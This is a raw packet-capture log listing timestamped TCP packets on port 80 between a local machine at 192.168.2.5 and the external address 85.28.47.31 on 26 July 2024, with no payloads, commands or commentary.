Jul 26, 2024 17:56:15.525568008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525579929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525585890 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.525592089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.525604010 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.525621891 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.525651932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.526247978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526259899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526272058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526282072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526293039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526299000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526308060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.526308060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526320934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526331902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526331902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.526344061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526351929 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.526355982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.526375055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.526405096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.527241945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527252913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527262926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527273893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527283907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527295113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527304888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.527306080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527317047 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527327061 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.527327061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527338982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527348995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.527352095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527363062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.527370930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.527379036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.527416945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528045893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528058052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528068066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528079033 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528090000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528099060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528100014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528110981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528120995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528121948 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528131008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528141975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528143883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528152943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528156042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528172970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528182983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528183937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528196096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528206110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528208017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528217077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.528234959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.528265953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529036999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529048920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529059887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529069901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529079914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529092073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529097080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529103041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529113054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529124022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529135942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529138088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529150009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529159069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529160023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529170990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529181004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529181004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529191971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529225111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529248953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529901028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529912949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529922009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529932976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529943943 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529944897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529954910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529966116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.529972076 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.529999971 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.530544043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.530555964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.530566931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.530577898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.530597925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.530606985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.530623913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.530623913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.530653954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.612821102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.612844944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.612855911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.612865925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.612879038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.612888098 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.612898111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.612919092 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.612946987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.613152981 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613163948 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613173008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613182068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613193035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613214970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.613220930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.613250017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.613585949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613596916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613607883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613619089 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613630056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613640070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613645077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.613650084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613658905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613668919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613681078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.613682985 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.613704920 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.613724947 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.614366055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614377022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614386082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614396095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614404917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614413977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614423990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614428043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.614434004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614444017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614453077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614461899 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614464998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.614474058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614483118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.614485979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.614509106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.614526033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.615381956 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615395069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615403891 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615412951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615422010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615432024 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615441084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615442038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.615451097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615461111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615466118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.615470886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615482092 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615489960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.615492105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615502119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.615510941 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.615535975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.616275072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616286993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616297960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616307974 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616317034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616328001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616329908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.616337061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616345882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616357088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616365910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616374016 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616384983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616390944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.616398096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616390944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.616408110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.616441011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.616441011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.617288113 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617300034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617307901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617319107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617327929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617336988 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617346048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617348909 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.617356062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617364883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617368937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617377996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617377996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.617388964 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617399931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617404938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.617412090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.617424965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.617454052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.618264914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618278027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618288994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618299007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618309021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618319035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618324041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.618324995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618335009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618345022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618354082 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.618355989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618370056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618371964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.618381977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618393898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.618396044 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.618415117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.618441105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619209051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619221926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619232893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619244099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619254112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619263887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619266987 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619273901 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619283915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619287014 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619293928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619304895 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619304895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619330883 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619349957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619718075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619729996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619740009 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619750977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619760990 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619771957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619775057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619782925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619795084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619803905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.619820118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619827032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.619853020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.712918043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.712933064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713007927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713107109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713116884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713152885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713179111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713185072 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713191032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713202000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713212967 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713222980 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713222980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713238001 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713267088 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713728905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713741064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713751078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713762045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713771105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713781118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713792086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713800907 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713813066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713821888 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713831902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713833094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713845015 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.713849068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713849068 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713877916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.713887930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.714576960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714586973 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714596987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714607000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714618921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714628935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.714629889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714636087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714643955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714649916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.714656115 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714665890 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714675903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714679956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.714687109 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714696884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.714713097 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.714718103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.714741945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.715495110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715504885 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715513945 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715523958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715533972 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715543985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715548038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.715553045 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715564013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715572119 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715574026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.715590954 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715600014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715604067 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.715611935 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715620995 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.715624094 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.715646029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.715672970 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:15.716427088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716438055 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716448069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716458082 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716466904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:15.716473103 CEST	49704	80	192.168.2.5	85.28.47.31
